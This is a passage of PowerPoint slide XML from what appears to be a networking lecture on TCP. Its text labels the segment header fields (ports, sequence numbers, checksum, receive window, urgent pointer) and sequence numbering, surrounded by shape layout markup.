                <a:gd name="connsiteX2" fmla="*/ 11391 w 11391"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 28694"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11877"/>
                <a:gd name="connsiteY0" fmla="*/ 32885 h 32885"/>
                <a:gd name="connsiteX1" fmla="*/ 10451 w 11877"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 32885"/>
                <a:gd name="connsiteX2" fmla="*/ 11877 w 11877"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 32885"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11573"/>
                <a:gd name="connsiteY0" fmla="*/ 32885 h 32885"/>
                <a:gd name="connsiteX1" fmla="*/ 10147 w 11573"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 32885"/>
                <a:gd name="connsiteX2" fmla="*/ 11573 w 11573"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 32885"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11573"/>
                <a:gd name="connsiteY0" fmla="*/ 28757 h 28757"/>
                <a:gd name="connsiteX1" fmla="*/ 10147 w 11573"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 28757"/>
                <a:gd name="connsiteX2" fmla="*/ 11573 w 11573"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 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3" h="28757">
                  <a:moveTo>
                    <a:pt x="0" y="28757"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10147" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11573" y="0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FAC28DB-6339-42E6-A969-FB89FC687845}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5775299" y="2863949"/>
              <a:ext cx="587710" cy="339181"/>
              <a:chOff x="5775299" y="2863949"/>
              <a:chExt cx="587710" cy="339181"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="65" name="Text Box 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685B91B2-DC36-80C3-749D-928652DCD5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83766" y="2864576"/>
                <a:ext cx="27924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F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" name="Text Box 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DEF191D-659B-D78B-03C6-345A3742D1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9184" y="2863949"/>
                <a:ext cx="27924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S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" name="Text Box 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437CDA42-C7A9-3FC2-195B-38A02CFA12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75299" y="2863950"/>
                <a:ext cx="296876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R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57BA599-286A-D55D-08C2-2D0C91EB368B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5277007" y="2859957"/>
            <a:ext cx="2976178" cy="719405"/>
            <a:chOff x="5277007" y="2859957"/>
            <a:chExt cx="2976178" cy="719405"/>
          </a:xfrm>
        </p:grpSpPr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EACE19CB-FFFD-DEFD-36F5-BA7D00AFF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735" y="3212649"/>
              <a:ext cx="1822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Urg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data pointer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FD523F5-8B2F-9E9D-625B-670AF63E40E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5277007" y="2859957"/>
              <a:ext cx="627836" cy="345695"/>
              <a:chOff x="5527528" y="3067992"/>
              <a:chExt cx="627836" cy="345695"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="71" name="Text Box 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B21EC4-4CDE-DC04-F90D-36B7D6CAAA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4900" y="3067992"/>
                <a:ext cx="290464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P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" name="Text Box 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B419CEBA-4998-2EFA-81EE-C174C5AA55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27528" y="3075133"/>
                <a:ext cx="316112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U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73" name="Line 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD2CABE4-0B55-3539-CDB2-A3F3C8E2AC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8305" y="2821148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74" name="Line 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16622F65-4F9B-EA9D-CC8E-B2ED92CF06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8693" y="2812182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1DCB14F-08CA-C216-A55C-CAE572169B85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="182880" y="2863950"/>
            <a:ext cx="5235245" cy="1390074"/>
            <a:chOff x="182880" y="2863950"/>
            <a:chExt cx="5235245" cy="139007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44E0C23-1D63-80C9-F1AE-CF6324D6C55A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4962499" y="2863950"/>
              <a:ext cx="455626" cy="338554"/>
              <a:chOff x="4962499" y="2863950"/>
              <a:chExt cx="455626" cy="338554"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Text Box 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B8A00AD-92E8-4E4D-934E-7199E23BD7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62499" y="2863950"/>
                <a:ext cx="296876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C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0" name="Text Box 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A43D4D-2C05-21B7-FF1C-83FB1189F0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1249" y="2863950"/>
                <a:ext cx="296876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E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" name="Text Box 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF68C177-4239-841A-B337-D54435785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" y="3829292"/>
              <a:ext cx="3384479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C, E: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congestion notification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78" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38DB4AB-EE6B-2E81-8C60-5DEA92410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195" y="3136684"/>
              <a:ext cx="1749482" cy="914811"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1458"/>
                <a:gd name="T1" fmla="*/ 2147483647 h 444"/>
                <a:gd name="T2" fmla="*/ 2147483647 w 1458"/>
                <a:gd name="T3" fmla="*/ 0 h 444"/>
                <a:gd name="T4" fmla="*/ 2147483647 w 1458"/>
                <a:gd name="T5" fmla="*/ 2147483647 h 444"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 10533"/>
                <a:gd name="connsiteY0" fmla="*/ 10875 h 10875"/>
                <a:gd name="connsiteX1" fmla="*/ 9093 w 10533"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10875"/>
                <a:gd name="connsiteX2" fmla="*/ 10533 w 10533"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 10875"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11345"/>
                <a:gd name="connsiteY0" fmla="*/ 13363 h 13363"/>
                <a:gd name="connsiteX1" fmla="*/ 9905 w 11345"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 13363"/>
                <a:gd name="connsiteX2" fmla="*/ 11345 w 11345"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 13363"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11465"/>
                <a:gd name="connsiteY0" fmla="*/ 23977 h 23977"/>
                <a:gd name="connsiteX1" fmla="*/ 10025 w 11465"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 23977"/>
                <a:gd name="connsiteX2" fmla="*/ 11465 w 11465"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 23977"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11405"/>
                <a:gd name="connsiteY0" fmla="*/ 28694 h 28694"/>
                <a:gd name="connsiteX1" fmla="*/ 9965 w 11405"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 28694"/>
                <a:gd name="connsiteX2" fmla="*/ 11405 w 11405"/>
                <a:gd name="connsiteY2" fmla="*/ 135 h 28694"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11391"/>
                <a:gd name="connsiteY0" fmla="*/ 28694 h 28694"/>
                <a:gd name="connsiteX1" fmla="*/ 9965 w 11391"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 28694"/>
                <a:gd name="connsiteX2" fmla="*/ 11391 w 11391"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 28694"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 11391"/>
                <a:gd name="connsiteY0" fmla="*/ 28743 h 28743"/>
                <a:gd name="connsiteX1" fmla="*/ 6388 w 11391"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 28743"/>
                <a:gd name="connsiteX2" fmla="*/ 11391 w 11391"/>
                <a:gd name="connsiteY2" fmla="*/ 49 h 28743"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7455"/>
                <a:gd name="connsiteY0" fmla="*/ 28792 h 28792"/>
                <a:gd name="connsiteX1" fmla="*/ 6388 w 7455"/>
                <a:gd name="connsiteY1" fmla="*/ 49 h 28792"/>
                <a:gd name="connsiteX2" fmla="*/ 7455 w 7455"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 28792"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 9679"/>
                <a:gd name="connsiteY0" fmla="*/ 9983 h 9983"/>
                <a:gd name="connsiteX1" fmla="*/ 8569 w 9679"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 9983"/>
                <a:gd name="connsiteX2" fmla="*/ 9679 w 9679"/>
                <a:gd name="connsiteY2" fmla="*/ 34 h 9983"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 10062"/>
                <a:gd name="connsiteY0" fmla="*/ 10017 h 10017"/>
                <a:gd name="connsiteX1" fmla="*/ 8853 w 10062"/>
                <a:gd name="connsiteY1" fmla="*/ 17 h 10017"/>
                <a:gd name="connsiteX2" fmla="*/ 10062 w 10062"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1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62" h="10017">
                  <a:moveTo>
                    <a:pt x="0" y="10017"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8853" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10062" y="0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36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8E0F21-D605-6032-4BDF-F9718BED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TCP sequence numbers, ACKs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A7BEC-AED1-3A71-AF6C-137B07699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5496D6-2387-FFF8-BD23-4D5185092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171" y="1355712"/>
            <a:ext cx="5096669" cy="131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4950" marR="0" lvl="0" indent="-1238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Sequence numbers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635000" marR="0" lvl="1" indent="-27781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byte stream “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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number” of first byte in segment’s data</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ja-JP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192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C683D602-A2FD-876A-FC8D-8400372BC5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7783528" y="3989281"/>
            <a:ext cx="3086106" cy="2541588"/>
            <a:chOff x="3520" y="2404"/>
            <a:chExt cx="1944" cy="1601"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91F64E2-886E-FB4B-A3AC-25A095320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5" y="3589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" name="Group 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FDFFC0-F680-17D8-DE73-7683720CF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1" y="3291"/>
              <a:ext cx="1252" cy="714"/>
              <a:chOff x="1974" y="2984"/>
              <a:chExt cx="1252" cy="714"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D2934B-51F4-CAA7-57E7-7A270CBEC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" name="Text Box 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6D35E6-BA9D-D59C-55DC-A29CCB1918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1" y="2984"/>
                <a:ext cx="5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source port #</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Text Box 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16FA205C-1AA2-8426-8C03-8F19E45F9A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" y="2987"/>
                <a:ext cx="491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dest port #</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Text Box 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52A235CD-E78E-3406-FAB4-7B96D1AFF4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sequence number</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Text Box 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6862DD14-81AB-4FB8-E62D-A48502CA3E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4" y="3257"/>
                <a:ext cx="125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16" name="Text Box 154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91524FE0-F03A-D3F4-172B-8A9B9B91C7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3" y="3544"/>
                <a:ext cx="47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checksum</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Line 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59147443-11D7-11BD-54AB-1AEC8605C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" name="Line 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7228A8B-39DA-9674-2AF5-ACEB22710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" name="Line 157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA63512-66B0-592C-96F0-E261791E5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" name="Line 158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B25D059-907E-0430-5F1B-04E5EA8787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" name="Line 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07064253-07E0-D762-7782-A107E15251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" name="Line 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3C8458-D7B6-9074-4922-399B94475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" name="Text Box 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD193899-D518-BBAE-AF95-8285FFE4A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8" y="3390"/>
                <a:ext cx="32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rwnd</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Text Box 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB08D651-E661-0F32-12E1-75EE4FB98F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1" y="3544"/>
                <a:ext cx="4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urg pointer</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Line 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82B73BA-9E8C-A743-860C-78ACA75104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" name="Line 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3E063EB-DF07-01CC-BCC7-5598EA0C4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" name="Text Box 166">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48EFFBD5-BF84-457B-8677-CB1F234D8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" y="3092"/>
              <a:ext cx="19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outgoing segment from receiver</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{666242EF-3187-9CA3-29C9-57E2BD24DE6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599" y="2404"/>
              <a:ext cx="107" cy="119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13768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" name="Group 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6629173C-66A9-64EF-BC0F-1E216A4B0638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8685214" y="6022869"/>
            <a:ext cx="358775" cy="304800"/>
            <a:chOff x="5144" y="3677"/>
            <a:chExt cx="226" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 194">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4EA2876-D98E-00D8-47C0-1819CA2D7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2" y="3716"/>
              <a:ext cx="88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" name="Text Box 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A00E25AC-B470-B9B2-79A6-0B87E9EA2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4" y="3677"/>
              <a:ext cx="22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charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4BBB93-9410-0EC1-FB96-20F47E107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7" y="3123626"/>
            <a:ext cx="65087" cy="6223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6EA47BEA-8110-8461-A74F-A224E398B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614" y="3125214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2" name="Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9234C296-752F-84AB-BA67-509DB4675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039" y="3123626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" name="Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C926CB31-03D8-5542-5D2D-4BC96D364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877" y="3123626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4" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADFE930-DBC2-3F05-3F71-BD44F799D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7" y="3123626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5" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7BA8934-EFA2-0699-9FBC-5F0AD5D42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4" y="3123626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6" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{236A0D00-EB42-5CC2-C8F8-278B68C06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2039" y="3123626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7" name="Rectangle 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E75B97A-240D-DE9E-1577-E77B295D0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7289" y="3123626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8" name="Rectangle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA48C24-EEF4-6FB0-E179-C21421216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2539" y="3123626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9" name="Rectangle 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65155F4A-DAF6-77CE-EC6C-072FF8EE7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902" y="3123626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0" name="Rectangle 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEB8B4A-F8A6-27E4-A7AE-D45441FD1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7327" y="3125214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1" name="Rectangle 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDC33D4-8F0E-9EFA-98AD-561A58595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164" y="3123626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2" name="Rectangle 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7913970B-73EF-3757-F07B-CCD5225A9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2" y="3123626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3" name="Rectangle 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73021DD8-B359-7290-DBCE-312A86339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7839" y="3123626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C2B45C8C-178E-7509-EF2B-20E5032E3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089" y="3123626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5" name="Rectangle 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61B81B6E-C88F-3A9B-2B99-240A59977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164" y="3123626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6" name="Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7B6B78-8D81-D864-C7C3-8DA9B0C27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414" y="3123626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33FDA9DB-6285-FE84-071A-014F151ED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2" y="3123626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8" name="Rectangle 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0415D4B5-EC06-6CD3-5B6C-B4291CB21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152" y="3123626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9" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C91F23-2272-6F38-2D7D-3783919AE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1402" y="3123626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0" name="Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93A2AE0-2959-B568-2156-7F4864510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064" y="3122039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1" name="Rectangle 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B850FDE2-EF94-DF54-E056-BAA085692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7139" y="3122039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2" name="Rectangle 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AB5040-2DA3-A64C-9405-4EA834699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977" y="3122039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3" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A7314E1-2E5B-8618-BAAA-176854C1D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227" y="3122039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4" name="Rectangle 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71723C62-26A2-4499-7398-5E569794E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7" y="3122039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5" name="Rectangle 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F43A744-C72B-61E1-F7A2-135D1065B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3377" y="3122039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6" name="Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DF3415-C2B5-FADF-B580-5C1AD21B1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214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7" name="Rectangle 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619BC48B-948B-D994-13CF-E80BD4F87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7052" y="3125214"/>
            <a:ext cx="65087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8" name="Rectangle 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81926853-4B20-0EE3-7F78-8A8A1C277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3889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9" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
